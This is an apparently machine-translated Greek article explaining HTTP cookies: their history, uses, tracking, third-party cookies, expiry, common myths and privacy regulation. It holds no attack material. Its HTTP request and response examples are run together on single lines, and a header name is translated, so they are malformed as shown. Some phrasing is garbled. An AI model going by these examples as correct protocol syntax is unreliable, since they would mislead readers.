Internet Cookie: Τι είναι; Ορισμός, Προέλευση, Τύποι και Απόρρητο

Un cookie ή web cookie (ή κουλουράκι, συντομογραφία ως μάρτυρας στο Κεμπέκ) ορίζεται από το πρωτόκολλο επικοινωνίας HTTP ως μια ακολουθία πληροφοριών που αποστέλλονται από έναν διακομιστή HTTP σε έναν πελάτη HTTP, τον οποίο ο τελευταίος επιστρέφει κάθε φορά που τίθεται ερώτημα στον ίδιο διακομιστή HTTP υπό ορισμένες συνθήκες.

Το cookie είναι ισοδύναμο του α μικρό αρχείο κειμένου που είναι αποθηκευμένο στο τερματικό του χρήστη του Διαδικτύου. Υπάρχουν για περισσότερα από 20 χρόνια, επιτρέπουν στους προγραμματιστές ιστότοπων να αποθηκεύουν δεδομένα χρηστών για να διευκολύνουν την πλοήγησή τους και να επιτρέπουν ορισμένες λειτουργίες. Τα cookies ήταν πάντα περισσότερο ή λιγότερο αμφιλεγόμενα επειδή περιέχουν υπολειμματικές προσωπικές πληροφορίες που μπορούν ενδεχομένως να αξιοποιηθούν από τρίτους.

Αποστέλλεται ως κεφαλίδα HTTP από τον διακομιστή ιστού στο πρόγραμμα περιήγησης ιστού, το οποίο το επιστρέφει αμετάβλητο κάθε φορά που αποκτά πρόσβαση στον διακομιστή. Μπορεί να χρησιμοποιηθεί ένα cookie έναν έλεγχο ταυτότητας, μια συνεδρία (κρατική συντήρηση), και για αποθήκευση συγκεκριμένων πληροφοριών για τον χρήστη, όπως οι προτιμήσεις ιστότοπου ή τα περιεχόμενα ενός ηλεκτρονικού καλαθιού αγορών. Ο όρος cookie προέρχεται από μαγικό μπισκότο, μια πολύ γνωστή έννοια στον υπολογισμό UNIX, η οποία ενέπνευσε την ιδέα και το όνομα των cookies του προγράμματος περιήγησης. Υπάρχουν μερικές εναλλακτικές λύσεις αντί των cookies, η καθεμία με τις δικές της χρήσεις, πλεονεκτήματα και μειονεκτήματα.

Όντας απλά αρχεία κειμένου, τα cookies δεν είναι εκτελέσιμα. Δεν είναι ούτε spyware ούτε ιούς, αν και τα cookie από ορισμένους ιστότοπους εντοπίζονται από πολλά λογισμικά προστασίας από ιούς, επειδή επιτρέπουν στους χρήστες να παρακολουθούνται όταν επισκέπτονται πολλούς ιστότοπους. 

Τα περισσότερα σύγχρονα προγράμματα περιήγησης επιτρέπουν στους χρήστες να αποφασίζει εάν θα αποδεχτεί ή θα απορρίψει τα cookies. Οι χρήστες μπορούν επίσης επιλέξτε πόσο καιρό θα αποθηκεύονται τα cookies. Ωστόσο, η πλήρης απόρριψη των cookies καθιστά ορισμένους ιστότοπους άχρηστους. Για παράδειγμα, αποθηκεύστε καλάθια αγορών ή ιστότοπους που απαιτούν σύνδεση χρησιμοποιώντας διαπιστευτήρια (όνομα χρήστη και κωδικός πρόσβασης).

Ιστορικός

Ο όρος κουλουράκι προέρχεται από τον αγγλικό όρο μαγικό μπισκότο, το οποίο είναι ένα πακέτο δεδομένων που λαμβάνει ένα πρόγραμμα και επιστρέφει αμετάβλητο. Τα cookies χρησιμοποιούνταν ήδη στην πληροφορική όταν Lou Montulli είχε την ιδέα να τα χρησιμοποιήσει σε διαδικτυακές επικοινωνίες τον Ιούνιο του 1994. Εκείνη την εποχή, εργαζόταν στην Netscape Communications, η οποία είχε αναπτύξει μια εφαρμογή ηλεκτρονικού εμπορίου για έναν πελάτη. Τα cookies έδωσαν λύση στο πρόβλημα της αξιοπιστίας της εφαρμογής εικονικού καλαθιού αγορών ενός καταστήματος.

Ο John Giannandrea και ο Lou Montulli έγραψαν την πρώτη προδιαγραφή cookie του Netscape την ίδια χρονιά. Έκδοση 0.9 beta του Mosaic Netscape, που κυκλοφόρησε στις 13 Οκτωβρίου 1994, ενσωματωμένη τεχνολογία cookie (δείτε την ανάρτηση). Η πρώτη (μη πειραματική) χρήση των cookies ήταν να καθοριστεί εάν οι επισκέπτες του ιστότοπου Netscape είχαν επισκεφτεί τον ιστότοπο στο παρελθόν. Η Montulli κατέθεσε αίτηση για δίπλωμα ευρεσιτεχνίας για την τεχνολογία cookie το 1995 και το δίπλωμα ευρεσιτεχνίας ΗΠΑ 5774670 χορηγήθηκε. χορηγήθηκε το 1998.

Αφού εφαρμόστηκαν στο Netscape 0.9 beta το 1994, τα cookies ενσωματώθηκαν στον Internet Explorer 2, ο οποίος κυκλοφόρησε τον Οκτώβριο του 1995.

Η εισαγωγή των cookies δεν έχει γίνει ακόμη ευρέως γνωστή στο κοινό. Συγκεκριμένα, τα cookies έγιναν δεκτά από προεπιλογή στις ρυθμίσεις του προγράμματος περιήγησης και οι χρήστες δεν ενημερώθηκαν για την παρουσία τους. Μερικοί άνθρωποι γνώριζαν την ύπαρξη των cookies γύρω στο πρώτο τρίμηνο του 1995, αλλά το ευρύ κοινό έλαβε γνώση της ύπαρξής τους μόνο αφού οι Financial Times δημοσίευσαν ένα άρθρο στις 12 Φεβρουαρίου 1996. Την ίδια χρονιά, τα cookies έλαβαν μεγάλη προσοχή από τα μέσα ενημέρωσης λόγω πιθανών παραβιάσεων της ιδιωτικής ζωής. Το θέμα των cookies συζητήθηκε σε δύο διαβουλεύσεις της Αμερικανικής Ομοσπονδιακής Επιτροπής Εμπορίου το 1996 και το 1997.

Η ανάπτυξη της επίσημης προδιαγραφής cookie ήταν ήδη σε εξέλιξη. Οι πρώτες συζητήσεις για τις επίσημες προδιαγραφές έγιναν τον Απρίλιο του 1995 στη λίστα αλληλογραφίας www-talk. Συγκροτήθηκε ειδική ομάδα εργασίας IETF. Δύο εναλλακτικές προτάσεις για την εισαγωγή κατάστασης στις συναλλαγές HTTP προτάθηκαν από τους Brian Behlendorf και David Kristol αντίστοιχα, αλλά η ομάδα, με επικεφαλής τον ίδιο τον Kristol, αποφάσισε να χρησιμοποιήσει τις προδιαγραφές του Netscape ως σημείο εκκίνησης. Τον Φεβρουάριο του 1996, η ομάδα εργασίας διαπίστωσε ότι τα cookies τρίτων αποτελούσαν σημαντική απειλή για το απόρρητο. Η προδιαγραφή που παρήγαγε η ομάδα δημοσιεύτηκε τελικά ως RFC 2109.

Από τα τέλη του 2014, βλέπουμε ένα banner σχετικά με τα cookies σε πολλούς ιστότοπους. Υπάρχει τουλάχιστον μία επέκταση προγράμματος περιήγησης που επιτρέπει το το banner δεν εμφανίζεται.

Τύποι cookies και χρήσεις

Διαχείριση συνεδρίας

Τα cookies μπορούν να χρησιμοποιηθούν για τη διατήρηση των δεδομένων χρήστη κατά την πλοήγηση, αλλά και σε πολλαπλές επισκέψεις. Τα cookies εισήχθησαν για να παρέχουν ένα μέσο υλοποίησης ηλεκτρονικών καροτσιών αγορών, μιας εικονικής συσκευής στην οποία ο χρήστης μπορεί να συγκεντρώσει τα στοιχεία που θέλει να αγοράσει κατά την περιήγησή του στον ιστότοπο.

Αυτές τις μέρες, εφαρμογές όπως τα καλάθια αγορών αποθηκεύουν τη λίστα των στοιχείων σε μια βάση δεδομένων σε έναν διακομιστή, κάτι που είναι προτιμότερο. παρά να τα αποθηκεύσετε στο ίδιο το cookie. Ο διακομιστής Ιστού στέλνει ένα cookie που περιέχει ένα μοναδικό αναγνωριστικό περιόδου σύνδεσης. Στη συνέχεια, το πρόγραμμα περιήγησης ιστού επιστρέφει αυτό το αναγνωριστικό περιόδου σύνδεσης σε κάθε επόμενο αίτημα και τα στοιχεία στο καλάθι αποθηκεύονται και συσχετίζονται με το ίδιο μοναδικό αναγνωριστικό περιόδου σύνδεσης.

Η συχνή χρήση cookies είναι χρήσιμη για τη σύνδεση σε έναν ιστότοπο χρησιμοποιώντας διαπιστευτήρια. Εν ολίγοις, ο διακομιστής Ιστού στέλνει πρώτα ένα cookie που περιέχει ένα μοναδικό αναγνωριστικό περιόδου σύνδεσης. Στη συνέχεια οι χρήστες παρέχουν τα διαπιστευτήριά τους (συνήθως όνομα χρήστη και κωδικό πρόσβασης). Στη συνέχεια, η εφαρμογή Ιστού επαληθεύει την ταυτότητα της συνεδρίας και επιτρέπει στον χρήστη να έχει πρόσβαση στην υπηρεσία.

εξατομίκευση

Τα cookies μπορούν να χρησιμοποιηθούν για την απομνημόνευση πληροφοριών σχετικά με τον χρήστη ενός ιστότοπου, προκειμένου να του δείξουν το κατάλληλο περιεχόμενο στο μέλλον. Για παράδειγμα, ένας διακομιστής ιστού μπορεί να στείλει ένα cookie που περιέχει το τελευταίο όνομα χρήστη που χρησιμοποιήθηκε για τη σύνδεση σε αυτόν τον ιστότοπο, έτσι ώστε το όνομα χρήστη να μπορεί να συμπληρωθεί εκ των προτέρων σε μελλοντικές επισκέψεις.

Πολλοί ιστότοποι χρησιμοποιούν cookies για εξατομίκευση με βάση τις προτιμήσεις των χρηστών. Οι χρήστες επιλέγουν τις προτιμήσεις τους σε μια φόρμα και τις υποβάλλουν στον διακομιστή. Ο διακομιστής κωδικοποιεί τις προτιμήσεις σε ένα cookie και το στέλνει πίσω στο πρόγραμμα περιήγησης. Στη συνέχεια, κάθε φορά που ο χρήστης αποκτά πρόσβαση σε μια σελίδα αυτού του ιστότοπου, το πρόγραμμα περιήγησης επιστρέφει το cookie και επομένως τη λίστα των προτιμήσεων. ο διακομιστής μπορεί στη συνέχεια να προσαρμόσει τη σελίδα σύμφωνα με τις προτιμήσεις του χρήστη. Για παράδειγμα, ο ιστότοπος της Wikipedia επιτρέπει στους χρήστες του να επιλέξουν το δέρμα του ιστότοπου που προτιμούν. Η μηχανή αναζήτησης Google επιτρέπει στους χρήστες της (ακόμα κι αν δεν είναι εγγεγραμμένοι) να επιλέξουν τον αριθμό των αποτελεσμάτων που θέλουν να δουν σε κάθε σελίδα αποτελεσμάτων.

Παρακολούθηση

Τα cookies παρακολούθησης χρησιμοποιούνται για την παρακολούθηση των συνηθειών περιήγησης των χρηστών του Διαδικτύου. Αυτό μπορεί επίσης να γίνει εν μέρει χρησιμοποιώντας τη διεύθυνση IP του υπολογιστή που υποβάλλει αίτημα για μια σελίδα ή χρησιμοποιώντας την κεφαλίδα HTTP «παραπομπής» που στέλνει ο πελάτης με κάθε αίτημα, αλλά τα cookies επιτρέπουν μεγαλύτερη ακρίβεια. Αυτό μπορεί να γίνει όπως στο παρακάτω παράδειγμα:

1. Εάν ο χρήστης καλέσει μια σελίδα σε έναν ιστότοπο και το αίτημα δεν περιέχει cookie, ο διακομιστής υποθέτει ότι αυτή είναι η πρώτη σελίδα που επισκέπτεται ο χρήστης. Στη συνέχεια, ο διακομιστής δημιουργεί μια τυχαία συμβολοσειρά και τη στέλνει στο πρόγραμμα περιήγησης μαζί με τη σελίδα που ζητήθηκε.
2. Από αυτή τη στιγμή, το cookie θα αποστέλλεται αυτόματα από το πρόγραμμα περιήγησης κάθε φορά που καλείται μια νέα σελίδα του ιστότοπου. Ο διακομιστής θα στείλει τη σελίδα ως συνήθως, αλλά θα καταγράψει επίσης τη διεύθυνση URL της σελίδας που καλείται, την ημερομηνία, την ώρα του αιτήματος και το cookie σε ένα αρχείο καταγραφής.

Εξετάζοντας το αρχείο καταγραφής, μπορείτε στη συνέχεια να δείτε ποιες σελίδες έχει επισκεφτεί ο χρήστης και με ποια σειρά. Για παράδειγμα, εάν το αρχείο περιέχει μερικά αιτήματα που έγιναν χρησιμοποιώντας το cookie id=abc, αυτό μπορεί να αποδείξει ότι όλα αυτά τα αιτήματα προέρχονται από τον ίδιο χρήστη. Η διεύθυνση URL που ζητήθηκε, η ημερομηνία και η ώρα που σχετίζονται με τα αιτήματα επιτρέπουν την παρακολούθηση της περιήγησης του χρήστη.

Τα cookie τρίτων κατασκευαστών και τα web beacons, που εξηγούνται παρακάτω, επιτρέπουν επιπλέον την παρακολούθηση σε διαφορετικούς ιστότοπους. Η παρακολούθηση ενός ιστότοπου χρησιμοποιείται γενικά για στατιστικούς σκοπούς. Αντίθετα, η παρακολούθηση σε διαφορετικούς ιστότοπους με χρήση cookie τρίτων χρησιμοποιείται γενικά από διαφημιστικές εταιρείες για την παραγωγή ανώνυμων προφίλ χρηστών (τα οποία στη συνέχεια χρησιμοποιούνται για να καθοριστεί ποιες διαφημίσεις πρέπει να εμφανίζονται στον χρήστη καθώς και για να του αποστέλλονται μηνύματα ηλεκτρονικού ταχυδρομείου που αντιστοιχούν σε αυτές τις διαφημίσεις — SPAM ).

Τα cookie παρακολούθησης αποτελούν κίνδυνο παραβίασης του απορρήτου των χρηστών, αλλά μπορούν εύκολα να διαγραφούν. Τα περισσότερα σύγχρονα προγράμματα περιήγησης περιλαμβάνουν μια επιλογή αυτόματης διαγραφής μόνιμα cookie κατά το κλείσιμο της εφαρμογής.

Cookies τρίτων

Οι εικόνες και άλλα αντικείμενα που περιέχονται σε μια ιστοσελίδα ενδέχεται να βρίσκονται σε διακομιστές διαφορετικούς από αυτόν που φιλοξενεί τη σελίδα. Για να εμφανιστεί η σελίδα, το πρόγραμμα περιήγησης κατεβάζει όλα αυτά τα αντικείμενα. Οι περισσότεροι ιστότοποι περιέχουν πληροφορίες από διαφορετικές πηγές. Για παράδειγμα, εάν πληκτρολογήσετε www.example.com στο πρόγραμμα περιήγησής σας, θα υπάρχουν συχνά αντικείμενα ή διαφημίσεις σε μέρος της σελίδας που προέρχονται από διαφορετικές πηγές, δηλαδή από διαφορετικό τομέα από το www. .example.com. Τα cookie "πρώτου" είναι cookies που ορίζονται από τον τομέα που αναφέρεται στη γραμμή διευθύνσεων του προγράμματος περιήγησης. Τα cookie τρίτου μέρους ορίζονται από ένα από τα αντικείμενα σελίδας που προέρχεται από διαφορετικό τομέα.

Από προεπιλογή, προγράμματα περιήγησης όπως το Mozilla Firefox, το Microsoft Internet Explorer και το Opera δέχονται cookies τρίτων, αλλά οι χρήστες μπορούν να αλλάξουν τις ρυθμίσεις στις επιλογές του προγράμματος περιήγησης για να τα αποκλείσουν. Δεν υπάρχει κίνδυνος ασφάλειας εγγενής στα cookie τρίτων που επιτρέπουν τη λειτουργικότητα του ιστού, ωστόσο χρησιμοποιούνται επίσης για την παρακολούθηση των χρηστών. από τοποθεσία σε τοποθεσία.

Εργαλεία όπως το Ghostery που είναι διαθέσιμα για όλα τα προγράμματα περιήγησης, συμπεριλαμβανομένου του Google Chrome, μπορούν να αποκλείσουν τις ανταλλαγές μεταξύ τρίτων.

Εκτέλεση

Τα cookies είναι μικρά κομμάτια δεδομένων που αποστέλλονται από τον διακομιστή ιστού στο πρόγραμμα περιήγησης. Το πρόγραμμα περιήγησης τα επιστρέφει αμετάβλητα στον διακομιστή, εισάγοντας την κατάσταση (μνήμη προηγούμενων γεγονότων) στην κατά τα άλλα συναλλαγή HTTP χωρίς κατάσταση. Χωρίς cookies, κάθε ανάκτηση μιας ιστοσελίδας ή ενός στοιχείου μιας ιστοσελίδας είναι ένα μεμονωμένο συμβάν, ανεξάρτητο από άλλα αιτήματα που γίνονται στον ίδιο ιστότοπο. Εκτός από τη δυνατότητα ρύθμισης από τον διακομιστή web, τα cookies μπορούν επίσης να οριστούν από γλώσσες δέσμης ενεργειών όπως η JavaScript, εάν υποστηρίζονται και εξουσιοδοτούνται από το πρόγραμμα περιήγησης.

Η επίσημη προδιαγραφή cookie υποδηλώνει ότι τα προγράμματα περιήγησης θα πρέπει να μπορούν να αποθηκεύουν και να στέλνουν ξανά έναν ελάχιστο αριθμό cookies. Συγκεκριμένα, ένα πρόγραμμα περιήγησης θα πρέπει να μπορεί να αποθηκεύει τουλάχιστον 300 cookies των τεσσάρων kilobyte το καθένα και τουλάχιστον 20 cookies για έναν μόνο διακομιστή ή τομέα.

Σύμφωνα με την ενότητα 3.1 του RFC 2965, στα ονόματα cookie δεν γίνεται διάκριση πεζών-κεφαλαίων.

Ένα cookie μπορεί να καθορίσει την ημερομηνία λήξης του, οπότε το cookie θα διαγραφεί σε αυτήν την ημερομηνία. Εάν το cookie δεν προσδιορίζει ημερομηνία λήξης, το cookie διαγράφεται μόλις ο χρήστης εγκαταλείψει το πρόγραμμα περιήγησής του. Επομένως, ο καθορισμός μιας ημερομηνίας λήξης είναι ένας τρόπος να επιβιώσει το cookie μέσω πολλαπλών περιόδων σύνδεσης. Για το λόγο αυτό, λέγονται cookies με ημερομηνία λήξης επίμονος. Ένα παράδειγμα εφαρμογής: ένας ιστότοπος λιανικής μπορεί να χρησιμοποιεί μόνιμα cookie για να καταγράφει τα στοιχεία που έχουν τοποθετήσει οι χρήστες στο καλάθι αγορών τους (στην πραγματικότητα, το cookie μπορεί να αναφέρεται σε μια καταχώρηση που είναι αποθηκευμένη σε μια βάση δεδομένων στον ιστότοπο πώλησης και όχι στον υπολογιστή σας) . Με αυτόν τον τρόπο, εάν οι χρήστες εγκαταλείψουν το πρόγραμμα περιήγησής τους χωρίς να κάνουν αγορά και επιστρέψουν σε αυτό αργότερα, θα μπορούν να βρουν ξανά τα προϊόντα στο καλάθι. Εάν αυτά τα cookies δεν έδιναν ημερομηνία λήξης, θα λήγουν όταν έκλεινε το πρόγραμμα περιήγησης και οι πληροφορίες σχετικά με τα περιεχόμενα του καλαθιού θα χάνονταν.

Το εύρος των cookies μπορεί να περιοριστεί σε έναν συγκεκριμένο τομέα, υποτομέα ή διαδρομή στον διακομιστή που τα δημιούργησε.

Δημιουργία cookie

Η μεταφορά των ιστοσελίδων γίνεται χρησιμοποιώντας το Πρωτόκολλο Μεταφοράς ΥπερΚειμένου (HTTP). Αγνοώντας τα cookies, τα προγράμματα περιήγησης καλούν μια σελίδα από διακομιστές ιστού στέλνοντάς τους γενικά ένα σύντομο κείμενο που ονομάζεται Αίτημα HTTP. Για παράδειγμα, για πρόσβαση στη σελίδα www.example.org/index.html, τα προγράμματα περιήγησης συνδέονται με τον διακομιστή www.example.org και στέλνουν ένα αίτημα που μοιάζει με αυτό:

	GET /index.html HTTP/1.1Host: www.example.org
πλοηγός	→	Serveur

Ο διακομιστής ανταποκρίνεται στέλνοντας τη σελίδα που ζητήσατε, πριν από ένα παρόμοιο κείμενο, όπου καλείται το σύνολο Απόκριση HTTP. Αυτό το πακέτο μπορεί να περιέχει γραμμές που καθοδηγούν το πρόγραμμα περιήγησης να αποθηκεύει cookies:

	HTTP/1.1 200 OK Τύπος περιεχομένου: text/htmlSet-Cookie: name=value (σελίδα HTML)
πλοηγός	←	Serveur

Ο διακομιστής στέλνει μόνο τη γραμμή Set-Cookie, εάν ο διακομιστής θέλει το πρόγραμμα περιήγησης να αποθηκεύσει ένα cookie. Το Set-Cookie είναι ένα αίτημα για το πρόγραμμα περιήγησης να αποθηκεύσει τη συμβολοσειρά name=value και να την επιστρέψει σε όλα τα μελλοντικά αιτήματα στον διακομιστή. Εάν το πρόγραμμα περιήγησης υποστηρίζει cookies και τα cookies είναι ενεργοποιημένα στις επιλογές του προγράμματος περιήγησης, το cookie θα συμπεριληφθεί σε όλα τα επόμενα αιτήματα που υποβάλλονται στον ίδιο διακομιστή. Για παράδειγμα, το πρόγραμμα περιήγησης καλεί τη σελίδα www.example.org/news.html στέλνοντας το ακόλουθο αίτημα στον διακομιστή www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
πλοηγός	→	Serveur

Αυτό είναι ένα αίτημα για μια άλλη σελίδα από τον ίδιο διακομιστή και διαφέρει από την πρώτη παραπάνω επειδή περιέχει μια συμβολοσειρά που ο διακομιστής έστειλε προηγουμένως στο πρόγραμμα περιήγησης. Χάρη σε αυτό το μέσο, ​​ο διακομιστής γνωρίζει ότι αυτό το αίτημα είναι συνδεδεμένο με το προηγούμενο. Ο διακομιστής ανταποκρίνεται στέλνοντας την καλούμενη σελίδα, καθώς και προσθέτοντας άλλα cookies σε αυτήν.

Η τιμή του cookie μπορεί να αλλάξει από τον διακομιστή στέλνοντας μια νέα γραμμή Set-Cookie: name=new_value ως απόκριση στην καλούμενη σελίδα. Στη συνέχεια, το πρόγραμμα περιήγησης αντικαθιστά την παλιά τιμή με τη νέα.

Η γραμμή Set-Cookie δημιουργείται συνήθως από ένα πρόγραμμα CGI ή άλλη γλώσσα δέσμης ενεργειών και όχι από τον διακομιστή HTTP. Ο διακομιστής HTTP (παράδειγμα: Apache) θα μεταδίδει μόνο το αποτέλεσμα του προγράμματος (ένα έγγραφο που προηγείται από την κεφαλίδα που περιέχει τα cookies) στο πρόγραμμα περιήγησης.

Τα cookies μπορούν επίσης να οριστούν από JavaScript ή άλλες παρόμοιες γλώσσες που εκτελούνται στο πρόγραμμα περιήγησης, δηλαδή από την πλευρά του πελάτη και όχι από την πλευρά του διακομιστή. Στο JavaScript, το αντικείμενο document.cookie χρησιμοποιείται για αυτόν τον σκοπό. Για παράδειγμα, η δήλωση document.cookie = "temperature=20" δημιουργεί ένα cookie με το όνομα "temperature" και με τιμή 20.

Χαρακτηριστικά ενός cookie

Εκτός από το ζεύγος ονόματος/τιμής, ένα cookie μπορεί επίσης να περιέχει μια ημερομηνία λήξης, μια διαδρομή, ένα όνομα τομέα και τον τύπο της προβλεπόμενης σύνδεσης, δηλαδή κανονική ή κρυπτογραφημένη. Το RFC 2965 ορίζει επίσης ότι τα cookie πρέπει να έχουν έναν υποχρεωτικό αριθμό έκδοσης, αλλά αυτός γενικά παραλείπεται. Αυτά τα τμήματα δεδομένων ακολουθούν το ζεύγος name=new_value και διαχωρίζονται με ερωτηματικά. Για παράδειγμα, ένα cookie μπορεί να δημιουργηθεί από τον διακομιστή στέλνοντας μια γραμμή Set-Cookie: name=new_value; λήγει=ημερομηνία; μονοπάτι=/; domain=.example.org.

Λήξη ενός cookie

Τα cookies λήγουν και στη συνέχεια δεν αποστέλλονται από το πρόγραμμα περιήγησης στον διακομιστή στις ακόλουθες περιπτώσεις:

• Όταν το πρόγραμμα περιήγησης είναι κλειστό, εάν το cookie δεν είναι μόνιμο.
• Όταν παρέλθει η ημερομηνία λήξης του cookie.
• Όταν η ημερομηνία λήξης του cookie αλλάξει (από τον διακομιστή ή το σενάριο) σε μια ημερομηνία στο παρελθόν.
• Όταν το πρόγραμμα περιήγησης διαγράφει το cookie κατόπιν αιτήματος του χρήστη.

Η τρίτη κατάσταση επιτρέπει σε διακομιστές ή σενάρια να διαγράψουν ρητά ένα cookie. Λάβετε υπόψη ότι με το πρόγραμμα περιήγησης Google Chrome είναι δυνατό να γνωρίζετε την ημερομηνία λήξης ενός συγκεκριμένου cookie μεταβαίνοντας στις ρυθμίσεις περιεχομένου. Ένα cookie που είναι αποθηκευμένο σε έναν υπολογιστή μπορεί κάλλιστα να παραμείνει εκεί για αρκετές δεκαετίες εάν δεν ακολουθηθεί καμία διαδικασία για τη διαγραφή του.

Στερεότυπα

Από την εισαγωγή τους στο Διαδίκτυο, πολλές ιδέες σχετικά με τα cookies έχουν κυκλοφορήσει στο Διαδίκτυο και στα μέσα ενημέρωσης. Το 1998, η CIAC, μια ομάδα παρακολούθησης συμβάντων υπολογιστή του Υπουργείου Ενέργειας των Ηνωμένων Πολιτειών, διαπίστωσε ότι οι ευπάθειες ασφαλείας των cookie ήταν «ουσιαστικά ανύπαρκτες» και εξήγησε ότι «πληροφορίες σχετικά με την προέλευση των επισκέψεών σας και τις λεπτομέρειες των ιστοσελίδων που έχετε επισκεφτεί υπάρχουν ήδη στα αρχεία καταγραφής των διακομιστών ιστού». Το 2005, η Jupiter Research δημοσίευσε τα αποτελέσματα μιας μελέτης, στην οποία ένα σημαντικό ποσοστό των ερωτηθέντων εξέτασε τις ακόλουθες δηλώσεις:

• Τα μπισκότα είναι σαν ιός, μολύνουν τους σκληρούς δίσκους των χρηστών.
• Τα cookies δημιουργούνται pop-up.
• Τα cookies χρησιμοποιούνται για την αποστολή το spam.
• Τα cookies χρησιμοποιούνται μόνο για διαφήμιση.

Τα cookies δεν μπορούν να διαγράψουν ή να διαβάσουν πληροφορίες από τον υπολογιστή του χρήστη. Ωστόσο, τα cookies καθιστούν δυνατό τον εντοπισμό των ιστοσελίδων που επισκέπτεται ένας χρήστης σε έναν δεδομένο ιστότοπο ή σύνολο τοποθεσιών. Αυτές οι πληροφορίες μπορούν να συλλεχθούν σε ένα προφίλ χρήστη που μπορεί να χρησιμοποιηθεί ή να μεταπωληθεί σε τρίτους, γεγονός που μπορεί να δημιουργήσει σοβαρά ζητήματα απορρήτου. Ορισμένα προφίλ είναι ανώνυμα, με την έννοια ότι δεν περιέχουν προσωπικά στοιχεία, ωστόσο ακόμη και τέτοια προφίλ μπορεί να είναι αμφισβητήσιμα.

Σύμφωνα με την ίδια μελέτη, μεγάλο ποσοστό των χρηστών του Διαδικτύου δεν γνωρίζει πώς να διαγράψει τα cookies. Ένας από τους λόγους για τους οποίους οι άνθρωποι δεν εμπιστεύονται τα cookie είναι ότι ορισμένοι ιστότοποι έχουν κάνει κατάχρηση της πτυχής προσωπικής αναγνώρισης των cookies και έχουν μοιραστεί αυτές τις πληροφορίες με άλλες πηγές. Ένα μεγάλο ποσοστό στοχευμένων διαφημίσεων και ανεπιθύμητων μηνυμάτων ηλεκτρονικού ταχυδρομείου, που θεωρούνται ανεπιθύμητα, προέρχονται από πληροφορίες που συλλέγονται από την παρακολούθηση των cookies.

Ρυθμίσεις προγράμματος περιήγησης

Τα περισσότερα προγράμματα περιήγησης υποστηρίζουν cookies και επιτρέπουν στον χρήστη να τα απενεργοποιήσει. Οι πιο συνηθισμένες επιλογές είναι:

• Ενεργοποιήστε ή απενεργοποιήστε εντελώς τα cookies, έτσι ώστε να γίνονται συνεχώς αποδεκτά ή να αποκλείονται.
• Επιτρέψτε στον χρήστη να δει τα ενεργά cookies σε μια δεδομένη σελίδα, εισάγοντας javascript: alert(document.cookie) στη γραμμή διευθύνσεων του προγράμματος περιήγησης. Ορισμένα προγράμματα περιήγησης ενσωματώνουν έναν διαχειριστή cookie για τον χρήστη που μπορεί να δει και να διαγράψει επιλεκτικά τα cookies που είναι αποθηκευμένα αυτήν τη στιγμή από το πρόγραμμα περιήγησης.

Τα περισσότερα προγράμματα περιήγησης επιτρέπουν επίσης την πλήρη διαγραφή προσωπικών δεδομένων που περιλαμβάνουν cookies. Υπάρχουν επίσης πρόσθετες μονάδες για τον έλεγχο των δικαιωμάτων cookie.

Απόρρητο και Cookies τρίτων

Σε αυτό το εικονικό παράδειγμα, μια διαφημιστική εταιρεία έχει τοποθετήσει πανό σε δύο ιστότοπους. Με τη φιλοξενία των banner στους διακομιστές της και τη χρήση cookies τρίτων, η διαφημιστική εταιρεία μπορεί να παρακολουθεί την πλοήγηση του χρήστη μέσω αυτών των δύο τοποθεσιών.

Τα cookies έχουν σημαντικές επιπτώσεις για το απόρρητο και την ανωνυμία των χρηστών του Διαδικτύου. Αν και τα cookie αποστέλλονται μόνο στον διακομιστή που τα έχει ορίσει ή σε διακομιστή που ανήκει στον ίδιο τομέα Διαδικτύου, μια ιστοσελίδα μπορεί ωστόσο να περιέχει εικόνες ή άλλα στοιχεία που είναι αποθηκευμένα σε διακομιστές που ανήκουν σε άλλους τομείς. Τα cookies που ορίζονται κατά την ανάκτηση αυτών των εξωτερικών στοιχείων ονομάζονται cookies τρίτων. Αυτό περιλαμβάνει cookies από ανεπιθύμητα αναδυόμενα παράθυρα.

Οι διαφημιστικές εταιρείες χρησιμοποιούν cookies τρίτων για την παρακολούθηση των χρηστών στους διάφορους ιστότοπους που επισκέπτονται. Συγκεκριμένα, μια διαφημιστική εταιρεία μπορεί να παρακολουθεί έναν χρήστη σε όλες τις σελίδες όπου έχει τοποθετήσει διαφημιστικές εικόνες ή ένα pixel παρακολούθησης. Η γνώση των σελίδων που επισκέπτεται ο χρήστης επιτρέπει στη διαφημιστική εταιρεία να στοχεύει στις διαφημιστικές προτιμήσεις του χρήστη.

Η δυνατότητα δημιουργίας προφίλ χρήστη θεωρείται από ορισμένους ως παραβίαση του απορρήτου, ειδικά όταν η παρακολούθηση πραγματοποιείται σε διαφορετικούς τομείς χρησιμοποιώντας cookie τρίτων. Για αυτόν τον λόγο, ορισμένες χώρες έχουν νομοθεσία για τα cookies.

Η κυβέρνηση των Ηνωμένων Πολιτειών εφάρμοσε αυστηρούς κανόνες για την τοποθέτηση cookies το 2000, αφού αποκαλύφθηκε ότι το Γραφείο Πολιτικής Ναρκωτικών του Λευκού Οίκου χρησιμοποιούσε cookies για να παρακολουθεί τους υπολογιστές των χρηστών που έβλεπαν διαφημίσεις ναρκωτικών στο διαδίκτυο. Το 2002, ο ακτιβιστής προστασίας της ιδιωτικής ζωής Daniel Brandt ανακάλυψε ότι η CIA άφηνε επίμονα cookies σε υπολογιστές που είχαν επισκεφτεί τους ιστότοπούς της. Μόλις ενημερώθηκε για αυτήν την παραβίαση, η CIA δήλωσε ότι αυτά τα cookies δεν στάλθηκαν σκόπιμα και διέκοψε τη ρύθμιση τους. Στις 25 Δεκεμβρίου 2005, ο Brandt ανακάλυψε ότι η Εθνική Υπηρεσία Ασφαλείας (NSA) είχε αφήσει δύο μόνιμα cookies στους υπολογιστές των επισκεπτών λόγω μιας ενημέρωσης λογισμικού. Μετά την ειδοποίηση, η NSA απενεργοποίησε αμέσως τα cookies.

Στο Ηνωμένο Βασίλειο, το Νόμος για τα cookies «, που τέθηκε σε ισχύ στις 25 Μαΐου 2012, υποχρεώνει τους ιστότοπους να δηλώνουν τις προθέσεις τους, επιτρέποντας έτσι στους χρήστες να επιλέξουν εάν θέλουν να αφήσουν ίχνη ή όχι από το πέρασμά τους στο Διαδίκτυο. Μπορούν έτσι να προστατεύονται από τη διαφημιστική στόχευση. Ωστόσο, σύμφωνα με The Guardian, η συγκατάθεση των χρηστών του Διαδικτύου δεν είναι απαραίτητα ρητή. έχουν γίνει αλλαγές στους όρους συναίνεσης χρήστη, καθιστώντας την υπονοείται έτσι.

Οδηγία 2002/58 για την ιδιωτική ζωή

